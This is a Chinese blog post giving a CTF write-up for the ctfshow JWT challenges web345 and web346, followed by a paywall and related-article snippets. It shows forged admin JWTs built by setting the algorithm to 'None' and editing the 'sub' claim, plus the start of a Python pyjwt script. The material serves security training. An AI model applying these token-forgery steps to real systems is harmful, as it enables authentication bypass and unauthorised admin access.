【CTFSHOW】web入门 JWT

最新推荐文章于 2025-04-09 18:33:31 发布
最新推荐文章于 2025-04-09 18:33:31 发布
阅读量1.3k 收藏 3
点赞数 2
分类专栏: CTFSHOW 文章标签: python 网络安全 web安全 nodejs devexpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46003360/article/details/120508928
版权

文章目录

写在前面

陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷

JWT浅析

JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下:

JWT浅析2

HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方式,大同小异。

PAYLOAD中一般包括用户信息。

Verify Signature中包括加密的密码。

JWT本质上是一种校验值,用来验证身份和数据是否被更改。

web345

查看源码得到hint:

/admin/

flag应该就在这。

抓包:

JWT345_抓包

其中auth也就是JWT的值为:

auth=eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI2MjI1ODksImV4cCI6MTYzMjYyOTc4OSwibmJmIjoxNjMyNjIyNTg5LCJzdWIiOiJ1c2VyIiwianRpIjoiZDNlYjRlZTgyMThjMmNmZTVlMGQxMjM5MjNlNDc0M2EifV0

用.将值分开并进行base64解密,得到:

{"alg":"None","typ":"jwt"}
[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"user","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]


[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"user","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]

改为:

[{"sub":"admin"}]

并进行base64加密,然后与

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0

进行拼接得到:

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0A.W3sic3ViIjoiYWRtaW4ifV0

将auth参数的值修改并访问/admin/得到flag:

flag

web346

抓包得到:

auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYzMjYyNjc4MiwiZXhwIjoxNjMyNjMzOTgyLCJuYmYiOjE2MzI2MjY3ODIsInN1YiI6InVzZXIiLCJqdGkiOiJiZTNmOGIyNTk5MDgxMWQzZmQ5NDAxODA0ZTgzNDI2MSJ9.ZYm_-gnvPWCZq8MSY0tB741URv13s34THxtOrcf-nE4

使用https://jwt.io/解密得到:

JWT346_解密

可以看到使用了加密算法HS256,我们可以把它设置为“None”,再把sub对应的值改为admin:

{"alg":"None","typ":"JWT"}.{
    "iss":"admin",
    "iat":1632635621,
    "exp":1632642821,
    "nbf":1632635621,
    "sub":"admin",
    "jti":"0a3fac5da5f0db3addcabaf6c8babc2a"
    }

使用python的jwt进行加密:

import jwt

# payload
token_dict = {
   
    "iss":"admin",
    "iat":1632635621,
    "exp":1632642821,
    "nbf":1632635621,
    "sub":"admin",
    "jti":"0a3fac5da5f0db3addcabaf6c8babc2a"
    }
最低0.47元/天 解锁文章
ctf_show笔记篇(web入门---jwt
whale_waves的博客
04-02 1754
JSON Web Token(JWT)通常由三部分组成简单地说jwt就是一串字符串,类似于序列化这种,把用户的信息保存在字符串里JWT全称是,如果从字面上理解感觉是基于JSON格式用于网络传输的令牌。实际上,JWT是一种紧凑的Claims声明格式,旨在用于空间受限的环境进行传输,常见的场景如HTTP授权请求头参数和URI查询参数。JWT会把Claims转换成JSON格式,而这个JSON内容将会应用为JWS结构的有效载荷或者应用为JWE结构的(加密处理后的)原始字符串,通过消息认证码(或者简称MAC。
ctfshow——JWT
qq_55202378的博客
05-01 1589
抓个包,可以看到cookie部分使用JWT(Json Web Token)。 先用base64将JWT进行解密,修改为admin,再用base64进行加密。再访问 这里使用了HS256加密方式,方法:alg字段改为,sub改为,对每一段分别用base64进行加密,然后用拼接起来,注意最后一个点不能少。都可以用jwt-cracker进行爆破,获取密匙。或者用脚本跑。 web 349——非对称加密算法RS256私钥泄漏 根据提示,大致意思就是访问,服务器会使用RS256算法私钥加密一段字符串作为cookie
CTFSHOW 爆破 web入门21-28
最新发布
SwagRee_的博客
04-09 871
又和上一道题一样有mt_srand 但是这个种子 我们似乎没办法猜测 因为我们不知道flag是什么 他截取了对flag进行md5之后的的前8位 再进一步变成16进制的 看到这里 感觉很迷惑 但是既然这是爆破题 大概可以猜到 应该是爆破种子了 但是纯爆破要太久了 题目都超时了呗!原来这涉及到伪随机数的概念 生成的伪随机数 生成序列是可以预测的 而这里又给了我们固定的种子 那我们也得整个php模拟一下这种情况了 看了一个师傅的wp 这个序列的生成还和版本有关 php8.2.9是可以拿到正确结果的版本。
ctfshow web入门 jwt
Sentiment的博客
12-10 2544
基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数据 签证 jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
ctfshow jwt web入门
2301_81040377的博客
06-03 704
jwt令牌由三部分组成,由分割header示例payload示例。
ctfshow web入门 jwt(持续更新)
Lum1n0us's Blog
08-02 1650
文章目录基础知识web345web346-347web348 基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1358
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
CTFSHOW web入门 web345
weixin_44833249的博客
09-29 299
正常来说一个jwt是有三个部分的:标头(Header)、有效载荷(Payload)和签名(Signature)但是这个是最简单的jwt,都没有签名,那么我们可以直接构造了。将拿到的jwt按照.分开,并将上面的一段进行base64解密。这里要注意的是最后要加上".",要不然会得不到flag。由于环境问题,这个加密算法要改成HS256。将user改成admin并base64加密。然后将后面一部分进行base64解密。访问admin路径得到flag。
[CTFSHOW]JWT
Y4tacker的博客
01-12 5597
文章目录前言JWT简介CTFSHOW Web345CTFSHOW Web346前置知识开始做题CTFSHOW Web347CTFSHOW Web348CTFSHOW Web349CTFSHOW Web350前置知识利用WP如何防御 前言 有些师傅向我咨询WP,索性就发了吧,其实早就写好了,只是懒,在github仓库里囤着 JWT简介 可以看看我的Github总结给自己看的,Y4tacker CTFSHOW Web345 首先打开题目,查看源码,接下来访问/admin被跳转回主页啥也没有发生 where is
.Net WebAPi JWT身份验证
11-07
**.NET WebAPI JWT身份验证详解** 在现代Web应用程序中,安全性和权限管理是至关重要的。JSON Web Token(JWT)是一种轻量级的身份验证和授权机制,被广泛应用于API访问控制。本文将深入探讨如何在.NET Framework ...
ctfshow web入门 JWT
Anton1a的博客
02-24 4595
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
CTFSHOW jwt
羽的博客
12-30 6123
可以先了解下jwt jwt由三部分组成header、payload、signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } payload示例 { "sub": "1234567890", "name": "John Doe" } signature jwt的第三部分是一个签证信息,这个签证信息由三部分组成: header (base64编码) payload (base64编码) secret(密钥) 这个部分需要base64加密后的he
CTFshow JWT
starttv的博客
11-24 516
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
ctfshow-jwt
2401_87493916的博客
12-25 1045
将信息进行安全的封装,以json的方式传递三部分分别是:Header{'typ': 'JWT' token类型'alg': 'HS256' 算法名称}将这个信息进行base64加密,构成了第一部分payload载荷,存放主要信息的地方{"sub": '1234567890', 标准中注册的声明"name": 'john', 公共的声明"admin" :true 私有的声明}base64加密,得到jwt第二部分第三部分Signature签名签名是将加密后的header和payload用点拼接,再将结果通过He
ctfshow web入门(SSRF)
Blazing-Angel的博客
07-19 1156
ctfshow
ctfshow web入门(SSTI)
m0_62422842的博客
06-18 1567
ctfshowweb入门中ssti题目的总结
ctfshowweb入门
qq_62553635的博客
01-15 2568
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
CTFSHOW~WEB入门
ing_end的博客
01-21 1373
WEB~4(2022.1.16) 看题目,提示我们查看robots.txt文件 注:什么是robots.txt文件?   搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。   您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在...
CTFShow-Web入门
weixin_58546222的博客
12-04 2510
CTFShow-信息收集
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TurkeyMan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值